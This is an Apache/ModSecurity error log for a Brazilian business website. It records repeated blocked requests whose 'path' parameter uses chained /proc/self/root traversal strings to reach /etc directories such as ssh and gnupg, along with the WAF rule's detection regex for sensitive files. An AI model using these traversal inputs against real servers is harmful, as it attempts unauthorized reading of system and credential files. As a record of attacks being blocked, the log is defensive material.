[Wed Mar 18 14:56:26.382586 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.241.31:41594] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnSuw_le52K8_3pV0JDwAAAgw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:26.455190 2026] [:error] [pid 14269:tid 140411725141760] [client 74.7.243.128:33622] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnSgbLMZ6AikZjR9Xr9AAAAAI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:27.691791 2026] [:error] [pid 26799:tid 140411741927168] [client 74.7.241.31:38624] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnS9a6ubjKNq_cu4bK2AAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:29.030593 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.241.31:38626] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnTUzinOy1jxa1j4dHjQAAAQ0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:30.354427 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.241.31:38634] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnTuw_le52K8_3pV0JEQAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:30.885338 2026] [mime_magic:error] [pid 30077:tid 140411741927168] (70014)End of file found: [client 57.141.18.66:51498] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 14:56:31.674487 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.241.31:38638] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnTwbLMZ6AikZjR9Xr-QAAAAA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:32.950960 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.241.31:38654] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnUAkwaGbbGflqUZA_dAAAANY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:40.327280 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.243.128:54164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnWOoXxyEfFpUF8f-gDgAAAVY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:56:46.011592 2026] [:error] [pid 14269:tid 140411699963648] [client 74.7.241.31:38670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnXgbLMZ6AikZjR9XsFgAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 14:57:03.407839 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.241.31:46318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnbwkwaGbbGflqUZA_jgAAAM0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:57:15.554222 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.243.128:46044] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrne0zinOy1jxa1j4dHwgAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:57:44.912842 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:36242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnmAkwaGbbGflqUZA_wAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 14:58:17.266785 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.243.128:40218] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnuQbLMZ6AikZjR9XsTwAAABc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:58:38.330461 2026] [:error] [pid 29882:tid 140411741927168] [client 74.7.243.128:53068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrnzUzinOy1jxa1j4dIEQAAAQA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:58:48.551258 2026] [:error] [pid 15051:tid 140411624429312] [client 74.7.243.128:41484] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abrn2CmAPhZkrhU8w4mZJgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 14:59:28.729174 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:50544] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroAMdf6f5d65gmYZQCPAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:59:34.532101 2026] [mime_magic:error] [pid 31803:tid 140411725141760] (70014)End of file found: [client 74.7.241.31:58082] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/usr/include/linux
[Wed Mar 18 14:59:43.803215 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.241.31:54078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroD9a6ubjKNq_cu4bLOAAAA0c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:59:56.035538 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:41626] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroHAkwaGbbGflqUZBAMQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 14:59:57.135639 2026] [:error] [pid 14269:tid 140411674785536] [client 74.7.241.31:38472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroHQbLMZ6AikZjR9XsfgAAAAg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 15:00:26.501773 2026] [mime_magic:error] [pid 15051:tid 140411599251200] (70014)End of file found: [client 57.141.18.105:58350] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 15:00:28.526413 2026] [:error] [pid 29882:tid 140411548894976] [client 74.7.241.31:55446] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroPEzinOy1jxa1j4dIaAAAARc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 15:02:11.528143 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.243.128:43194] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abroo0zinOy1jxa1j4dImwAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
